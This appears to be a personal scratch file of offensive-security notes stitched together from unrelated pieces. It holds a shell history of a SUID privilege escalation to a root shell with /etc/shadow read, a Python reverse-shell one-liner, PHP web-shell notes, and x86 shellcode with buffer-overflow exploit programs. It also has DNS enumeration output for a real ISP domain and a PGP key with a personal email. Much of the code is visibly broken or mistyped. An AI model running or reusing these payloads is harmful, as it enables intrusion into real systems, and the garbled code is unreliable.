1387Jan 17 19:55:44 debian kernel: [ 1.062605] udev[48]: starting version 164
1388Jan 17 19:55:44 debian kernel: [ 1.209990] SCSI subsystem initialized
1389Jan 17 19:55:44 debian kernel: [ 1.239423] FDC 0 is a S82078B
1390Jan 17 19:55:44 debian kernel: [ 1.239452] Initialising Xen virtual ethernet driver.
1391Jan 17 19:55:44 debian kernel: [ 1.243025] scsi0 : ata_piix
1392Jan 17 19:55:44 debian kernel: [ 1.243138] scsi1 : ata_piix
1393Jan 17 19:55:44 debian kernel: [ 1.243166] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1394Jan 17 19:55:44 debian kernel: [ 1.243167] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1395Jan 17 19:55:44 debian kernel: [ 1.261421] xvda: xvda1 xvda2 < xvda5 >
1396Jan 17 19:55:44 debian kernel: [ 1.276068] xvdh: unknown partition table
1397Jan 17 19:55:44 debian kernel: [ 1.740246] PM: Starting manual resume from disk
1398Jan 17 19:55:44 debian kernel: [ 1.931552] kjournald starting. Commit interval 5 seconds
1399Jan 17 19:55:44 debian kernel: [ 1.931560] EXT3-fs: mounted filesystem with ordered data mode.
1400Jan 17 19:55:44 debian kernel: [ 5.842738] udev[275]: starting version 164
1401Jan 17 19:55:44 debian kernel: [ 6.710516] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1402Jan 17 19:55:44 debian kernel: [ 6.710521] ACPI: Power Button [PWRF]
1403Jan 17 19:55:44 debian kernel: [ 6.710556] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1404Jan 17 19:55:44 debian kernel: [ 6.710559] ACPI: Sleep Button [SLPF]
1405Jan 17 19:55:44 debian kernel: [ 6.710873] input: PC Speaker as /devices/platform/pcspkr/input/input4
1406Jan 17 19:55:44 debian kernel: [ 7.873021] processor LNXCPU:00: registered as cooling_device0
1407Jan 17 19:55:44 debian kernel: [ 8.910449] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1408Jan 17 19:55:44 debian kernel: [ 12.712237] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1409Jan 17 19:55:44 debian kernel: [ 109.414393] EXT3 FS on xvda1, internal journal
1410Jan 17 19:55:44 debian kernel: [ 110.118130] loop: module loaded
1411Jan 17 19:55:44 debian kernel: [ 110.283292] sys_init_module: 'fexec'->init suspiciously returned 529170432, it should follow 0/-E convention
1412Jan 17 19:55:44 debian kernel: [ 110.283293] sys_init_module: loading module anyway...
1413Jan 17 19:55:44 debian kernel: [ 110.283296] Pid: 934, comm: modprobe Not tainted 2.6.32-5-amd64 #1
1414Jan 17 19:55:44 debian kernel: [ 110.283297] Call Trace:
1415Jan 17 19:55:44 debian kernel: [ 110.283303] [<ffffffff8107aec3>] ? sys_init_module+0x158/0x21a
1416Jan 17 19:55:44 debian kernel: [ 110.283306] [<ffffffff81010b42>] ? system_call_fastpath+0x16/0x1b
1417Jan 17 19:55:44 debian kernel: [ 116.943575] RPC: Registered udp transport module.
1418Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
1419Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
1420Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
1421Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
1422Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
1423Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
1424Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1425Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
1426Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1427Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
1428rootbash-4.1# history | tail -100
1429 115 ls
1430 116 cat /etc/hosts.allow
1431 117 arp -A
1432 118 arp
1433 119 arp -vpn
1434 120 arp -vn
1435 121 netstat -A
1436 122 netstat -r
1437 123 netstat -i
1438 124 netstat -g
1439 125 netstat -e
1440 126 netstat -l
1441 127 netstat
1442 128 man netstat
1443 129 netstat -tcp
1444 130 netstat -udp
1445 131 netstat -p tcp
1446 132 netstat -p udp
1447 133 netstat -p tcp 22
1448 134 netstat -p 22
1449 135 netstat -p 80
1450 136 netstat -p tcp
1451 137 netstat -p udp
1452 138 ls
1453 139 clear
1454 140 dmesg | grep /var/log
1455 141 dmesg | grep /var/log/messages.log
1456 142 cd /var/log
1457 143 ls
1458 144 dmesg | grep /var/log/syslog | less
1459 145 dmesg | grep /var/log/syslog | more
1460 146 dmesg | grep /var/log/syslog
1461 147 ls -la /var/log/syslog
1462 148 chmod 755 /var/log/syslog
1463 149 ls -la /var/log/syslog
1464 150 ls
1465 151 tail -f /var/log/syslog
1466 152 tail -f /var/log/syslog | more
1467 153 dmesg | grep /var/log/syslog > w0rd.txt
1468 154 cat w0rd.txt
1469 155 ls
1470 156 chmod 755 w0rd.txt
1471 157 ls
1472 158 cat w0rd.txt
1473 159 ls -la w0rd.txt
1474 160 rm -f w0rd.txt
1475 161 ls
1476 162 cat /var/log/syslog
1477 163 cat /var/log/syslog | less foo.txt
1478 164 cat /var/log/syslog | grep /usr/local/bin
1479 165 cat /var/log/syslog | grep /tmp
1480 166 cat /var/log/syslog | grep /rootbash
1481 167 ls
1482 168 cat /var/log/syslog
1483 169 ls
1484 170 dmesg /var/log/auth.log.2.gz
1485 171 cat /var/log/wtmp
1486 172 cat /var/run/utmp
1487 173 who am i
1488 174 users
1489 175 last
1490 176 finger
1491 177 cat /var/log/secure
1492 178 cat /var/log/auth.log
1493 179 head -5 /var/log/auth.log
1494 180 fc -l -10
1495 181 nano .bash_history
1496 182 history 100
1497 183 ls -la
1498 184 who am i
1499 185 cd /
1500 186 ls
1501 187 cd /home
1502 188 ls
1503 189 cd user/
1504 190 ls
1505 191 cd ..
1506 192 ls
1507 193 cat /etc/passwd
1508 194 cat /etc/shadow
1509 195 exit
1510 196 /usr/local/bin/suid-env2
1511 197 env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
1512 198 /tmp/rootbash -p
1513 199 exit
1514 200 cls
1515 201 exit
1516 202 ls
1517 203 cd tools
1518 204 ls
1519 205 /tmp/rootbash -p
1520 206 exit
1521 207 su newroot
1522 208 whoami
1523 209 cat /etc/passwd
1524 210 su root
1525 211 exit
1526 212 tail -f /var/log/messages
1527 213 cat /var/log/messages
1528 214 history | tail -100
1529rootbash-4.1# id
1530uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
1531rootbash-4.1# whoami
1532root
1533rootbash-4.1# ls -la /home/user/bmillakid
1534rootbash-4.1# cd /home
1535rootbash-4.1# ls
1536user
1537rootbash-4.1# cd user
1538rootbash-4.1# ls
1539l33t.txt myvpn.ovpn tools
1540rootbash-4.1#
1541
1542
1543
1544
1545
1546
1547
1548
1549
1550
1551
1552
1553
1554
1555
1556
1557
15581. Checking if the parameter "commandString" is set
1559
15602. If it is, then the variable $command_string gets what was passed into the input field
1561
15623. The program then goes into a try block to execute the function passthru($command_string). You can read the docs on passthru() on PHP's website, but in general, it is executing what gets entered into the input then passing the output directly back to the browser.
1563
15644. If the try does not succeed, output the error to page. Generally this won't output anything because you can't output stderr but PHP doesn't let you have a try without a catch.
1565
1566
1567
1568reverse shell
1569http://10.10.202.91:8888/
1570/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,soc
1571ket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1572
1573
1574
1575
1576?noot=1 -1
1577
1578
1579
1580
1581
1582----BEGIN PGP PUBLIC KEY BLOCK-----
1583Comment: https://keybase.io/download
1584Version: Keybase Go 5.6.0 (windows)
1585
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
1632JSU4mVKnCAZggCAq8fryKPS+TIFmLGc=
1633=QLLF
1634-----END PGP PUBLIC KEY BLOCK-----
1635
1636
1637//shell.c
1638int main() {
1639 char *name[2];
1640
1641 name[0] = "/bin/sh";
1642 name[1] = 0x0;
1643 execve(name[0], name, 0x0);
1644 exit (0);
1645 }
1646
1647
1648//shellcode.c
1649char shellcode[] =
1650“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1651
1652int main()
1653{
1654
1655 int = (int *)&ret +2;
1656 (*ret) = (int)shellcode;
1657
1658}
1659
1660[ask application to force input, causing the address we supplised to be loaded into EP
1661,we overwrite the first instruction in the “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1662
1663when RET is popped off the stack and loaded into EIP the first instruction is executed of the shellcode
1664
1665
1666Location pointer
1667
1668// find_start.c
1669unsigned long find_start(void)
1670{
1671
1672 __asm__("move1 %esp, %eax");
1673
1674}
1675
1676int main()
1677{
1678
1679 printf("0x%n\n",find_start());
1680}
1681
1682[putting programs into arranys with no bounds checking ]
1683 [has to be owned by root in suid]
1684
1685sudo chown root victim
1686sudo chmod +s victim
1687
1688./victim <shellcode>padding>choice-of-returnaddress
1689
1690./victim “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68” + printf "%020x"
1691
1692./victim $(printf "%0512x" 0)
1693./victim $(printf %0516x" 0)
1694./victim $(printf %0520x" 0)
1695./victim $(printf %0524x" 0)
1696Segfault
1697./victim $(printf %0528x" 0)
1698Segfault
1699[we can tell the saved return address is probably 524-528 bytes
1700shellcode = [40]
1701padding = [480]
1702saved ret address [0xbffffad8]
1703
1704./victim $(printf" \xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0480x\xd8\xfa\xff\xbf”)
1705[shellcode is at the start of the %s next is %0480x [4]bytes is dword for return address
1706
1707[little indian]
1708
1709./victim $(printf“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\xd8\xfa\xff\xbf”)
1710Illegal instruction
1711
17128%0484x\x38\xfa\xff\xbf")
1713
1714[program to guess offset between start of the program and first instruction for shellcode]
1715
1716#include <stdlib.h>
1717
1718#define offset_size 0
1719#define buffer_size 512
1720
1721
1722char sc[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1723
1724unsigned long find_start(void) {
1725
1726 __asm__(*mov1 %esp,%eax");
1727
1728}
1729
1730int main(int argc, char *argv[])
1731{
1732
1733 char *buff, *ptr;
1734 long *addr_ptr, addr;
1735 int offset=offset_size, bsize=buffer_size;
1736 int i;
1737
1738 if (argc > 1) bsize = atoi(argv[1]);
1739 if (argc > 2) offset = atoi(argv[2]);
1740
1741 addr = find_start() - offset;
1742 printf("attempt address: 0x%n\n",addr);
1743
1744 ptr = buff;
1745 addr_ptr =(long *) ptr;
1746 for (i - 0; i < bsize; i+=4)
1747 * (addr_ptr++) = addr;
1748
1749 ptr +=4;
1750
1751 for (i = 0; i < strlen(sc); i++)
1752 *(ptr++) = sc[i];
1753
1754 buff[bsize - 1] = '\0';
1755
1756 memcpy(buff, "BUF=",4);
1757 putenv(buff);
1758 system(" /bin/bash");
1759
1760}
1761
1762
1763[NOP]
1764
1765
1766
1767#include <stdlib.h>
1768
1769#define DEFAULT_OFFSET 0
1770#define DEFAULT_BUFFER_SIZE 512
1771#define NOP 0x90
1772
1773
1774 char shellcode[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
1775\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1776
1777unsigned long get_sp(void) {
1778 __asm__("mov1 %esp,%eax");
1779}
1780
1781void main(int argc, char *argv[])
1782
1783{
1784
1785 char *buff, *ptr;
1786
1787 long *addr_ptr, addr;int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;int i;if (argc > 1) bsize = atoi(argv[1]);if (argc > 2) offset = atoi(argv[2]);if (!(buff = malloc(bsize))) {printf(“Can’t allocate memory.\n”);exit(0);}addr = get_sp() - offset;printf(“Using address: 0x%x\n”, addr);ptr = buff;addr_ptr = (long *) ptr;for (i = 0; i < bsize; i+=4)*(addr_ptr++) = addr;for (i = 0; i < bsize/2; i++)buff[i] = NOP;ptr = buff + ((bsize/2) - (strlen(shellcode)/2));for (i = 0; i < strlen(shellcode); i++)*(ptr++) = shellcode[i];buff[bsize - 1] = ‘\0’;memcpy(buff,”BUF=”,4);putenv(buff);system(“/bin/bash”);}
1788
1789
1790
1791[+] Getting nameservers
179263.150.72.4 - authns1.qwest.net
1793208.44.130.120 - authns2.qwest.net
1794[-] Zone transfer failed
1795
1796[+] TXT records found
1797"v=spf1 include:inet.qwest.net include:oss.qwest.net ~all"
1798[+] MX records found, added to target list
179910 mx.centurylink.net.
1800[*] Scanning qwest.net for A records
1801204.147.80.94 - qwest.net
1802198.105.254.228 - webdisk.qwest.net
1803198.105.244.228 - webdisk.qwest.net
1804204.154.232.10 - ns.qwest.net
1805198.105.254.228 - www2.qwest.net
1806198.105.244.228 - www2.qwest.net
180765.115.167.3 - news.qwest.net
180865.115.167.4 - news.qwest.net
180965.115.167.6 - news.qwest.net
181065.115.167.5 - news.qwest.net
1811198.105.254.228 - mysql.qwest.net
1812198.105.244.228 - mysql.qwest.net
1813127.0.0.1 - localhost.qwest.net
1814207.109.18.208 - mx.qwest.net
1815207.109.18.207 - mx.qwest.net
1816198.105.254.228 - webmail.qwest.net
1817198.105.244.228 - webmail.qwest.net
1818198.105.254.228 - web.qwest.net
1819198.105.244.228 - web.qwest.net
1820198.105.254.228 - www1.qwest.net
1821198.105.244.228 - www1.qwest.net
1822198.105.254.228 - www3.qwest.net
1823198.105.244.228 - www3.qwest.net
1824204.147.80.90 - search.qwest.net
1825204.147.85.136 - mx1.qwest.net
1826204.147.80.94 - my.qwest.net
1827204.147.85.136 - mx2.qwest.net
182863.226.138.15 - relay.qwest.net
1829150.159.229.23 - pop.qwest.net
183010.1.64.5 - help.qwest.net
1831198.105.254.228 - web1.qwest.net
1832198.105.244.228 - web1.qwest.net
1833198.105.254.228 - home.qwest.net
1834198.105.244.228 - home.qwest.net
1835198.105.254.228 - www4.qwest.net
1836198.105.244.228 - www4.qwest.net
183766.77.32.148 - stat.qwest.net
1838209.3.158.116 - stat.qwest.net
1839198.105.254.228 - web2.qwest.net
1840198.105.244.228 - web2.qwest.net
1841198.105.254.228 - ww.qwest.net
1842198.105.244.228 - ww.qwest.net
1843216.111.65.217 - ns1.qwest.net
1844198.105.254.228 - webmail2.qwest.net
1845198.105.244.228 - webmail2.qwest.net
1846155.70.16.46 - community.qwest.net
1847198.105.254.228 - www5.qwest.net
1848198.105.244.228 - www5.qwest.net
184963.224.76.66 - im.qwest.net
1850198.105.254.228 - wwww.qwest.net
1851198.105.244.228 - wwww.qwest.net
1852205.171.16.250 - ns2.qwest.net
1853205.171.3.100 - speedtest.qwest.net
1854198.105.254.228 - ww2.qwest.net
1855198.105.244.228 - ww2.qwest.net
1856207.225.135.208 - www.qwest.net
1857198.105.254.228 - web3.qwest.net
1858198.105.244.228 - web3.qwest.net
1859204.132.179.26 - ftp1.qwest.net
1860198.105.254.228 - www6.qwest.net
1861198.105.244.228 - www6.qwest.net
1862205.169.123.86 - w3.qwest.net
186366.77.128.66 - css.qwest.net
1864198.105.254.228 - web4.qwest.net
1865198.105.244.228 - web4.qwest.net
1866204.154.232.162 - travel.qwest.net
1867198.105.254.228 - web5.qwest.net
1868198.105.244.228 - web5.qwest.net
1869198.105.254.228 - webconf.qwest.net
1870198.105.244.228 - webconf.qwest.net
1871205.168.252.1 - track.qwest.net
1872204.154.232.38 - directory.qwest.net
1873204.147.80.75 - register.qwest.net
1874198.105.254.228 - www7.qwest.net
1875198.105.244.228 - www7.qwest.net
1876198.105.254.228 - web01.qwest.net
1877198.105.244.228 - web01.qwest.net
1878205.171.2.25 - redirect.qwest.net
1879205.171.3.25 - redirect.qwest.net
1880198.105.254.228 - webservices.qwest.net
1881198.105.244.228 - webservices.qwest.net
1882198.105.254.228 - webcam.qwest.net
1883198.105.244.228 - webcam.qwest.net
1884205.168.252.5 - pr.qwest.net
1885198.105.254.228 - myadmin.qwest.net
1886198.105.244.228 - myadmin.qwest.net
1887198.105.254.228 - wwwtest.qwest.net
1888198.105.244.228 - wwwtest.qwest.net
1889198.105.254.228 - www8.qwest.net
1890198.105.244.228 - www8.qwest.net
1891150.159.22.70 - security.qwest.net
1892198.105.254.228 - webservice.qwest.net
1893198.105.244.228 - webservice.qwest.net
1894198.105.254.228 - web6.qwest.net
1895198.105.244.228 - web6.qwest.net
1896198.105.254.228 - webserver.qwest.net
1897198.105.244.228 - webserver.qwest.net
1898204.147.80.90 - www-test.qwest.net
1899151.119.46.220 - ci.qwest.net
1900198.105.254.228 - webtest.qwest.net
1901198.105.244.228 - webtest.qwest.net
1902208.47.0.98 - puppet.qwest.net
1903198.105.254.228 - www9.qwest.net
1904198.105.244.228 - www9.qwest.net
1905198.105.254.228 - webdav.qwest.net
1906198.105.244.228 - webdav.qwest.net
1907198.105.254.228 - webmail1.qwest.net
1908198.105.244.228 - webmail1.qwest.net
1909150.159.230.15 - webdev.qwest.net
1910198.105.254.228 - web02.qwest.net
1911198.105.244.228 - web02.qwest.net
1912150.159.229.43 - rc.qwest.net
1913198.105.254.228 - webapps.qwest.net
1914198.105.244.228 - webapps.qwest.net
1915198.105.254.228 - web8.qwest.net
1916198.105.244.228 - web8.qwest.net
1917198.105.254.228 - ww3.qwest.net
1918198.105.244.228 - ww3.qwest.net
1919198.105.254.228 - webapp.qwest.net
1920198.105.244.228 - webapp.qwest.net
1921198.105.254.228 - www-dev.qwest.net
1922198.105.244.228 - www-dev.qwest.net
1923198.105.254.228 - webmail3.qwest.net
1924198.105.244.228 - webmail3.qwest.net
1925198.105.254.228 - wwwold.qwest.net
1926198.105.244.228 - wwwold.qwest.net
1927198.105.254.228 - www10.qwest.net
1928198.105.244.228 - www10.qwest.net
1929
1930
1931#include <stdio.h>
1932#include <stdlib.h>
1933
1934void jumpesp(){
1935 __asm__("jmp *%esp"); //gadget to jump to esp
1936{
1937
1938void copy(char *arg) {
1939 char buf[1000];
1940 memcpy(buf ,arg, strlen(arg)); //vuln function
1941}
1942
1943int main(int argc, char **argv) {
1944
1945 if(argc>1) {
1946 copy(argv[1]);
1947 }
1948 return 0;
1949}
1950 dissa objdump get address of our jmp to esp
19510x80483f7
19523 how much buffer can it handle
1953
1954./vuln 'python -c 'print "A"*1000''
1955gdb r 'python -c 'print "A"*1000''+ "CCCC"'
1956
1957junk ="A" * {random}
1958padding = "CCCC"
1959jmpesp = "0x80483f7"
1960shellcode = ""\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
1961"\x53\x68\tty\x68\dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80
1962\x31\xc0\x50\x86//ssh\x86/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
1963
1964
1965
1966
1967
1968